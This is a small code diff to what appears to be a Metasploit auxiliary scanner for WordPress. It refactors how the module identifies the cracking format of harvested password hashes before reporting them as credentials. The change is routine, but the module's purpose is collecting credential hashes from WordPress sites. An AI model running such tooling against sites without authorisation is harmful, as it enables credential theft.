@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Auxiliary::Scanner
-  require 'metasploit/framework/hashes/identify'
 
   def initialize(info = {})
     super(
@@ -154,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary
               module_fullname: fullname,
               username: username,
               private_type: :nonreplayable_hash,
-              jtr_format: identify_hash(hash),
+              jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
               private_data: hash,
               service_name: 'Wordpress',
               address: ip,
